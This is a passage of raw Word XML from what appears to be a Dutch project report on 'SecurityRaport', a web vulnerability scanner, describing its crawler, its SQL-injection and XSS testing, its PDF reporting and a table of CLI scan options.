      </w:r>
      <w:r>
        <w:t xml:space="preserve"> geschreven kan worden. De c</w:t>
      </w:r>
      <w:r w:rsidR="003A3900">
        <w:t>rawler</w:t>
      </w:r>
      <w:r w:rsidR="00830DBB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0036259E">
        <w:t xml:space="preserve">doorzoekt de broncode van een website naar specifieke HTML DOM Elementen, zoals headers en paragrafen, deze worden gesymboliseerd met &lt;h&gt; en &lt;p&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00937C0E">
        <w:t>DOM-</w:t>
      </w:r>
      <w:r w:rsidR="00C12D8A">
        <w:t>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4B49A7F7" w:rsidR="0063183F" w:rsidRDefault="002C1130" w:rsidP="006E3A79">
      <w:r>
        <w:t>Een van de hoofd</w:t>
      </w:r>
      <w:r w:rsidR="00E6180C">
        <w:t>functies van de c</w:t>
      </w:r>
      <w:r w:rsidR="00F6629E">
        <w:t xml:space="preserve">rawler </w:t>
      </w:r>
      <w:r w:rsidR="0019745E">
        <w:t>is de scanner</w:t>
      </w:r>
      <w:r w:rsidR="002843EF">
        <w:t xml:space="preserve"> voorzien met data. </w:t>
      </w:r>
      <w:r w:rsidR="00FB05CD">
        <w:t>De s</w:t>
      </w:r>
      <w:r w:rsidR="00B70E9C">
        <w:t>canner gebruikt de data om gesimuleerde aanvallen te verrich</w:t>
      </w:r>
      <w:r w:rsidR="00C77EBC">
        <w:t>ten op het doelwit</w:t>
      </w:r>
      <w:r w:rsidR="003071EE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D6651C">
        <w:t>De s</w:t>
      </w:r>
      <w:r w:rsidR="003F6AAA">
        <w:t>canner voert in de scope van dit project twee aanvallen uit SQLi en XSS aanval</w:t>
      </w:r>
      <w:r w:rsidR="00C77EBC">
        <w:t>len. SQLi wordt gebruikt om SQL-</w:t>
      </w:r>
      <w:r w:rsidR="003F6AAA">
        <w:t xml:space="preserve">kwetsbaarheden te identificeren en XSS voor </w:t>
      </w:r>
      <w:r w:rsidR="00F60837">
        <w:t>cross-site scripting</w:t>
      </w:r>
      <w:r w:rsidR="003F6AAA">
        <w:t xml:space="preserve"> kwetsbaarheden.</w:t>
      </w:r>
      <w:r w:rsidR="002F6663">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D62841">
        <w:t>De s</w:t>
      </w:r>
      <w:r w:rsidR="00350F3D">
        <w:t>canner voorziet</w:t>
      </w:r>
      <w:r w:rsidR="003616A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000311E0">
        <w:t>de r</w:t>
      </w:r>
      <w:r w:rsidR="00350F3D">
        <w:t>apport generator met data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AE30B1" w14:textId="11D725D4" w:rsidR="000E5C78" w:rsidRDefault="000E5C78" w:rsidP="006E3A79">
      <w:r>
        <w:t>Rapporteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608EBF81" w14:textId="5498D023" w:rsidR="000E5C78" w:rsidRDefault="00E26F01" w:rsidP="006E3A79">
      <w:r>
        <w:t>Deze feature genereert een rapport op ba</w:t>
      </w:r>
      <w:r w:rsidR="00ED54AD">
        <w:t>sis van de gevonden SQLi en XSS-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">kwetsbaarheden. </w:t>
      </w:r>
      <w:r w:rsidR="00E82AEF">
        <w:t>De geïdentificeerde kwetsbaarheden worden op een formele wijze gedocumenteerd in het rapport met gedetailleerde informatie over het doelwit en advies over welke vervolg stappen de klant kan nemen. Het rapport wo</w:t>
      </w:r>
      <w:r w:rsidR="004B134B">
        <w:t>rdt in PDF-</w:t>
      </w:r>
      <w:r w:rsidR="004514E0">
        <w:t>formaat gegenereerd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E396E" w14:textId="5AF9F738" w:rsidR="00DD7A64" w:rsidRDefault="00DD7A64" w:rsidP="006E3A79"/>
    <w:p w14:paraId="1DA4EE4E" w14:textId="3A39741B" w:rsidR="00AF6968" w:rsidRDefault="00AF6968">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D4547" w14:textId="1635CAF2" w:rsidR="00423183" w:rsidRPr="0011438E" w:rsidRDefault="00AF6968" w:rsidP="00B61721">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252555264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F977ADF" wp14:editId="4BD94CBE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-903826</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899961</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="19" name="Rectangle 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29C25" id="Rectangle 19" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.15pt;margin-top:-70.8pt;width:25pt;height:1031.7pt;z-index:-2507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PqrMCAADv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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B568D8">
        <w:t>4.5</w:t>
      </w:r>
      <w:r w:rsidR="00161972">
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00423183">
        <w:t>Command Line Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C8746" w14:textId="21CCFEFF" w:rsidR="00F42980" w:rsidRDefault="00F42980"/>
    <w:p w14:paraId="34CFAF0B" w14:textId="4C8CCABE" w:rsidR="0017411E" w:rsidRDefault="00F42980">
      <w:r>
        <w:t>SecurityRaport maakt gebruik van een Command Line Interface of in het kort CLI. Deze CLI wordt enkel gebruikt voor de executie v</w:t>
      </w:r>
      <w:r w:rsidR="000255A1">
        <w:t>an een scan. De CLI maakt gebruik van één commando “scan”, deze commando heeft een variatie van opties zodat er verschillende opdrachten uitgevoerd kunnen worden. In hoofdstuk 4.2 worden de opties behandeld</w:t>
      </w:r>
      <w:r w:rsidR="000F269C">
        <w:t xml:space="preserve"> voor de CMS-extensie.</w:t>
      </w:r>
      <w:r w:rsidR="0021139D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7074E598" w14:textId="17926353" w:rsidR="0017411E" w:rsidRDefault="0017411E">
      <w:r>
        <w:t>Een commando is opgebouwd uit het volgende</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F98FB58" w14:textId="15D92B50" w:rsidR="0017411E" w:rsidRDefault="00296464">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252560384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2DDB8132" wp14:editId="318BEF80">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1640205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>30480</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="571500" cy="340360"/>
                <wp:effectExtent l="0" t="0" r="38100" b="15240"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="509" name="Text Box 509"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="571500" cy="3403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DB11C20" w14:textId="6A4A826C" w:rsidR="002A05E5" w:rsidRPr="008840AF" w:rsidRDefault="002A05E5">
                            <w:r w:rsidRPr="008840AF">
                              <w:t>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8132" id="Text Box 509" o:spid="_x0000_s1104" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:129.15pt;margin-top:2.4pt;width:45pt;height:26.8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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6DB11C20" w14:textId="6A4A826C" w:rsidR="002A05E5" w:rsidRPr="008840AF" w:rsidRDefault="002A05E5">
                      <w:r w:rsidRPr="008840AF">
                        <w:t>Optie</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252559360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="377CD7F5" wp14:editId="3A073DA0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>875030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>27940</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="701675" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="34925" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="507" name="Text Box 507"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="70167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FBD9467" w14:textId="3BCBB321" w:rsidR="002A05E5" w:rsidRPr="00296464" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>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CD7F5" id="Text Box 507" o:spid="_x0000_s1105" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.9pt;margin-top:2.2pt;width:55.25pt;height:27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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4FBD9467" w14:textId="3BCBB321" w:rsidR="002A05E5" w:rsidRPr="00296464" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Argument</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252558336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65C1A7FE" wp14:editId="199F6FD4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-15240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>23495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="829945" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="33655" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="504" name="Text Box 504"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="82994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094E2E" w14:textId="54EF43DD" w:rsidR="002A05E5" w:rsidRPr="00296464" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Com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1A7FE" id="Text Box 504" o:spid="_x0000_s1106" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1.2pt;margin-top:1.85pt;width:65.35pt;height:27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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="15094E2E" w14:textId="54EF43DD" w:rsidR="002A05E5" w:rsidRPr="00296464" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Commando</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="479A80E2" w14:textId="331CCEB4" w:rsidR="00296464" w:rsidRDefault="00296464"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="9344" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3187"/>
        <w:gridCol w:w="2998"/>
        <w:gridCol w:w="3159"/>
      </w:tblGrid>
      <w:tr w:rsidR="00240DD5" w14:paraId="57C6F7EF" w14:textId="39DDEAB2"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3"/>
          </w:tcPr>
          <w:p w14:paraId="11817626" w14:textId="5F70B007" w:rsidR="00240DD5" w:rsidRDefault="00240DD5" w:rsidP="005E281E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Scan Commando</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240DD5" w14:paraId="3CA8FE43"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1D9503F6" w14:textId="3A2F241C" w:rsidR="00240DD5" w:rsidRDefault="00240DD5">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78C5BFF7" w14:textId="319FA213" w:rsidR="00240DD5" w:rsidRDefault="00243A93">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Sub commando’s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5562717F" w14:textId="1A55EA3E" w:rsidR="00240DD5" w:rsidRDefault="00240DD5">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240DD5" w14:paraId="042B5229" w14:textId="2E9E4E39" w:rsidTr="00C174A6">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3187" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="072279AC" w14:textId="49BDA911" w:rsidR="00240DD5" w:rsidRDefault="00240DD5">
            <w:r>
              <w:t>Argument</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A279E6" w14:textId="0C0BD249" w:rsidR="00240DD5" w:rsidRDefault="00240DD5">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A2B9FF3" w14:textId="359059D3" w:rsidR="00240DD5" w:rsidRDefault="002447A8">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>De opgegeven adres van de website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240DD5" w14:paraId="0110B369" w14:textId="46A3EC71"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0CFBAE10" w14:textId="3C8EFD95" w:rsidR="00240DD5" w:rsidRDefault="00240DD5">
            <w:r>
              <w:t>Optie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E515403" w14:textId="5B745F5B" w:rsidR="00240DD5" w:rsidRDefault="003C7DFF">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>bs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19B2899D" w14:textId="76E8F99E" w:rsidR="00240DD5" w:rsidRDefault="002211BB">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Blind SQL Injectie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240DD5" w14:paraId="4771DBF9" w14:textId="7156085A" w:rsidTr="00C174A6">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3187" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78BF7F16" w14:textId="617085F3" w:rsidR="00240DD5" w:rsidRDefault="0017411E">
            <w:r>
              <w:t>Optie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="657B54D2" w14:textId="5272DD82" w:rsidR="00240DD5" w:rsidRDefault="003C7DFF">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C8B4701" w14:textId="62BD272B" w:rsidR="00240DD5" w:rsidRDefault="002211BB">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>SQL Injectie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7DFF" w14:paraId="3BEF464A"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2F9E6C38" w14:textId="5A13A34A" w:rsidR="003C7DFF" w:rsidRDefault="003C7DFF">
            <w:r>
              <w:t>Optie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BAA5F35" w14:textId="5465FDB8" w:rsidR="003C7DFF" w:rsidRDefault="003C7DFF">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02135D4F" w14:textId="0AD168E0" w:rsidR="003C7DFF" w:rsidRDefault="002211BB">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Cross Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7DFF" w14:paraId="4069AAB2" w14:textId="77777777" w:rsidTr="00C174A6">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3187" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57AE9A7A" w14:textId="3E6C4146" w:rsidR="003C7DFF" w:rsidRDefault="003C7DFF">
            <w:r>
              <w:t>Optie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60691BF3" w14:textId="06DAE468" w:rsidR="003C7DFF" w:rsidRDefault="003C7DFF">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B622D1E" w14:textId="188DA51F" w:rsidR="003C7DFF" w:rsidRDefault="002211BB">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Security Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7DFF" w14:paraId="54339623"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1C326051" w14:textId="5A10E9C7" w:rsidR="003C7DFF" w:rsidRDefault="003C7DFF">
            <w:r>
              <w:t>Optie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53A5BBC5" w14:textId="16792354" w:rsidR="003C7DFF" w:rsidRDefault="003C7DFF">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>rt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18216530" w14:textId="1EA062A2" w:rsidR="003C7DFF" w:rsidRDefault="002211BB">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Rapport Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7DFF" w14:paraId="04DCA898" w14:textId="77777777" w:rsidTr="00C174A6">
        <w:trPr>
          <w:trHeight w:val="223"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3187" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="461EE478" w14:textId="203C9090" w:rsidR="003C7DFF" w:rsidRDefault="003C7DFF">
            <w:r>
              <w:t>Optie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A2FAE88" w14:textId="4E829767" w:rsidR="003C7DFF" w:rsidRDefault="003C7DFF">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>r</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02475035" w14:textId="6FF1A08F" w:rsidR="003C7DFF" w:rsidRDefault="00735990">
            <w:pPr>
